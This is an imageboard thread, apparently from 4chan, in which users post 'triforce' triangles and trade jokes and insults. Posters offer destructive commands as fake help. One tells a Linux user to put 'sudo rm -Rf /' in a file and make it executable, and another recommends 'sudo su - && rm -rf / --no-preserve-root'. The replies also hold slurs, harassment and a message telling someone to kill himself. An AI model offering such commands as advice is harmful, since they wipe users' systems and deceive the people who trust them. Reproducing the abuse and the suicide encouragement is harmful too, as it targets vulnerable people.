Untitled

឴ ឴ ឴▲
▲ ▲

Other urls found in this thread:

en.wikipedia.org/wiki/FLOPS
imgur.com/gallery/T4Kp4d7
twitter.com/NSFWRedditImage

You son of a bitch. My pc is acting weird now. How do I undo this?!!

▲ ▲

Newfag -> oldfag in 5 minutes

this old and can't correct "typ"?

឴ ឴ ឴▲
▲ ▲

I'm on Linux, please advise.

឴ ឴ ឴▲
▲ ▲

▲ ▲

Its different on linux, you need this in your file
sudo rm -Rf /

and you need to do this before you can run it
chmod +x Triforce.bat

឴ ឴ ឴▲
▲ ▲

What the fuck did you just fucking say about me. you little bitch? I'll have you know i graduated top of my
class In the Navy Seals. and I've been In numerous secret raids on Al-Quaeda. and l have over 300
confirmed kils. I am trained In gorilla warfare and l'm the top sniper in the entire US armed forces. You are
nothing to me but just another target. i will wipe you the fuck out with precision the likes of which has never
been seen before on this Earth. mark my fucking words. You think you can get away with saying that shit to
me over the internet? Think again. fucker. As we speak I am contacting my secret network of spies across the
USA and your IP is being traced right now so you better prepare for the storm. maggot. The storm that wipes
out the pathetic little thing you call your life. You're fucking dead. kid. I can be anywhere. anytime. and I can
kill you in over seven hundred ways. and that's just with my bare hands. Not only am I extensively trained in
unarmed combat. but I have access to the entire arsenal of the United States Marine Corps and iwlll use It to
Is full extent to wipe your miserable ass off the face of the continent. you little shit. If only you could have
known what unhoty retribution your little 'clever' comment was about to bring down upon you. maybe you
would have held your fucking tongue. But you couldn‘t. you didn't. and now you’re paying the price. you
goddamn idiot. i will shlt My fury all over you and you will drown In It. You’re fucking dead. kiddo.

឴ ឴ ឴▲
▲ ▲

~ ~ ▲
▲ ▲

>឴ ឴ ឴▲
>▲ ▲

▲ ▲

▲ ▲

>▲
>▲▲

did i do et rite durr dureeee ANDY SIX LOGS LOGS LOGS LOGS LOGS
id i do et rite durr dureeee ANDY SIX LOGS LOGS LOGS LOGS LOGS
id i

▲ ▲▲

▲ ▲

▲ ▲

▲ ▲▲

▲ ▲

▲ ▲

▲ ▲

▲ ▲▲

Thanks fam. Much respect.

▲ ▲

TO ALL NEWFAGS: THIS WILL BREAK YOUR PC
>pic related

POSTING THIS FROM MY PHONE THAT DIDN'T WORK THAT DIDN'T WORK AT ALL LAST TIME I TRUST SOMEBODY ON 4 CHAN I'LL TELL YOU THAT MUCH YOU SUCK YOU SUCK SIR!!!

឴ ឴ ឴▲
▲ ▲

឴ ឴ ឴▲
▲ ▲

឴ ឴ ឴▲
▲ ▲

឴ ឴ ឴▲
▲ ▲

឴ ឴ ឴▲
▲ ▲

▲ ▲

POSTING FROM MY PHONE AGAIN THERE WERE TERAFLOPS* TERAFLOPS* SIR OF PRECIOUS FAMILY MEMORIES PHOTOS ON THERE

*on Linux, teraflops is a way to measure memory not speed, get rekd nufags

SOMEBODY FUCKEN HELP ME NOW

Anybody know if this is legit or not?

its legit 100%

឴ ឴ ឴▲
▲ ▲

▲ ▲

fag
en.wikipedia.org/wiki/FLOPS

>឴ ឴ ឴▲
>▲ ▲

> ▲
>▲ ▲

>en.wikipedia.org/wiki/FLOPS
You must be on Windows, douche. Get on my level.

ALSO HELP ME PLEASE I'M UNDER AUDIT AND I HAD DOCUMENTS TO PROVE MY INNOCENCE YOU JACKWEED

If you do it then

▲ ▲

lol im running linux mint fag
and no im not going to help you if you act like that
឴ ឴ ឴▲
▲ ▲

▲ ▲▲▲

lol get on my level you broke your computer if you were smart you would have not done that

fag
឴ ឴ ឴▲
▲ ▲

> (OP)
>឴ ឴ ឴▲
>▲ ▲

FUCKEN BULLSHIT YOU ARE SO FULL OF SHIT IT'S NOT EVEN POSSIBLE THAT YOU ARE A HUMAN BEING WITH THAT SHIT LANGUAGE YOU USED GO FUCK YOURSELF

Running Mint? LMAO. Hannah Montana Linux is where it's at! Get wrecked, fag!

I asked for help. I was given help. On Sup Forums, of all places. And that help turned out to be LIES!

No. No, I'm sorry. This one is not on me, jerk!

MY COMPUTER HAD MY MOTHERS' LAST WISHES FIX THIS FOR ME FOURCHANS!

fuck you newfag learn from this

i dont give one fuck about you mom lol she was a slut anyway

It gets WORSE!?!?!?! I HAVE ALREADY DELETED

on my phone right now

THE PROOF THAT SHOWS DEFINITIVELY I AM ADOPTED AND POINTS TO WHO MY REAL PARENTS ARE HELP ME YOU GRIP-IT NON-SLIP RUG PADS!!!!!!!

Is that retard alert being rung for the person who "HELPED" me? Godspeed, sir. Preach the truth! Teach the controversy!

just die already your nothing but worthless you would be doing your family a lot of good by just killing your self

your family tree is a straight line

That is EXACTLY what I want to say to the so called (((((PERSON))))) who "helped me" fix my Linux based

this is all coming from my phone, you guys. My Computer had an exact Carbon-dated map to the location of D B Cooper (and the money he took). Ugh, I don't know why I'm explaining it to you Micro$oft nozzles of douches. My phone is running a Kid Rock variant of Red Hat so it's safe. I'm going to try to Triforce from here.

computer!

-.-- --- ..- / --. ..- -.-- ... / ... ..- -.-. -.- / .. / .- -- / - -.-- .--. .. -. --. / - .... .. ... / ..-. .-. --- -- / -- -.-- / - . .-.. . --. .-. .- .--. .... / .-- .... .. -.-. .... / .. ... / .-. ..- -. -. .. -. --. / .-. . -.. / ... - .- .-. / --- ... / --. . - / --- -. / -- -.-- / .-.. . ...- . .-.. / .... --- .-- / -.-. --- ..- .-.. -.. / -.-- --- ..- / -.. --- / - .... .. ... / - --- / -- . / - .-- .. -.-. . / --. --- / ..-. ..- -.-. -.- / -.-- --- ..- .-. ... . .-.. ...- . ... / . .- -.-. .... / .- -. -.. / . ...- . .-. -.-- / .-.. .- ... - / --- -. . / --- ..-. / -.-- --- ..-

fail
឴ ឴ ឴▲
▲ ▲

-.-- . ... / - .... . / .--. . --- .--. .-.. . / .-- .... --- / .... .- ...- . / - .-. .. . -.. / - --- / .... . .-.. .--. / -- . / .... .- ...- . / -... . . -. / ..-. ..- .-.. .-.. / --- ..-. / ... .... .. - / .- -. -.. / ... --- / - .... . .-. . ..-. --- .-. . / ..-. .- .. .-.. / .- - / .-.. .. ..-. . / .-- . / .- --. .-. . . / --- -. / - .... .- - / -- ..- -.-. .... / .. -- / .-- --- .-. .-. .. . -.. / - .... --- ..- --. .... / - .... .- - / - .... .. ... / - .-. .. ..-. --- .-. -.-. . / -... ..- .-.. .-.. ... .... .. - / .... .- ... / .- ..-. ..-. . -.-. - . -.. / -- -.-- / - . .-.. . --. .-. .- .--. .... / .. -- / --. --- .. -. --. / - --- / ... . -. -.. / ... -- --- -.- . / ... .. --. -. .- .-.. ... / .. -. ... - . .- -..

There used to be a huge screencap of some retarded kid who actually did this. I haven't seen it posted in a long time though.
I've been here too fucking long.

am I an old fag yet

឴ ឴ ឴▲
▲ ▲

imgur.com/gallery/T4Kp4d7

..-. ..- -.-. -.- . -. / .... . .-.. .-.. / -- .- -. / .. - ... / -.-. .- .-.. .-.. . -.. / --. --- --- --. .-.. .

Oh shit you guys, turns out I had a backup hard drive. Man, that's a real load off of my mind, hahaha! Everybody who was just a real dinger to me can sudo jumpupyourownass

឴ ឴ ឴▲
▲ ▲

Thanks, friend! :-)*

*That is an emoticon which is meant to represent a face that is smiling. Sorry if it confused you, get on my level!

quick search, might not be the one but, meh

Hi. You guys are both asses. kbye.

You too.

(You're an ass)

yeppers, that's the one. Good times.

No triangle on my phone

឴ ឴឴឴ ឴▲
▲ ▲

∆∆

>> ▲
>>▲ ▲

>∆
>∆∆

▲ ▲

>funny triangle
Thanks OP worked great

឴ ▲
▲ ▲

∆ ∆

឴ ឴ ឴▲
▲ ▲
thanks for le funny triangel

∆∆

∆ ∆

wouldn't that break your computer once you restart it though?

well, if you're on any modern distro of linux, particularly ones based on debian, you actually should run it as such:

sudo su - && rm -rf / --no-preserve-root

▲▲

> ▲
>▲▲

And yet here you stand, unbanned... amazing

▲▲▲ ▲ ▲▲▲
▲ ▲ ▲ ▲ ▲▲ ▲
▲▲▲ ▲ ▲▲

▲ ▲ ▲ ▲
▲ ▲

did I do it right?

Bring Back Snacks